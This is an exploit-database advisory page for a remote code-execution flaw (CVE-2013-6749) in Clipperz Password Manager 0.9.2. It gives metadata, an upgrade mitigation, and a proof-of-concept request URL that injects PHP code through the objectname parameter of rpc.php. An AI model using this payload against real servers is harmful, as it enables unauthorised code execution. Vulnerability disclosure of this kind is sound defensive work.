header-logo
Suggest Exploit
vendor:
Password Manager
by:
SecurityFocus
9,3
CVSS
HIGH
Remote Code-Execution
94
CWE
Product Name: Password Manager
Affected Version From: 0.9.2
Affected Version To: 0.9.2
Patch Exists: YES
Related CWE: CVE-2013-6749
CPE: a:clipperz:password_manager
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2013

Clipperz Password Manager Remote Code-Execution Vulnerability

Attackers can exploit this issue to execute arbitrary code in the context of the affected application by sending a specially crafted request to http://www.example.com/password-manager-master/backend/php/src/setup/rpc.php?objectname=Xmenu();print_r(php_uname());die;

Mitigation:

Upgrade to the latest version of Clipperz Password Manager
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/67498/info

Clipperz Password Manager is prone to remote code-execution vulnerability.

Attackers can exploit this issue to execute arbitrary code in the context of the affected application. 

http://www.example.com/password-manager-master/backend/php/src/setup/rpc.php?objectname=Xmenu();print_r(php_uname());die

Navigation

Suggest Exploit

Services By CQR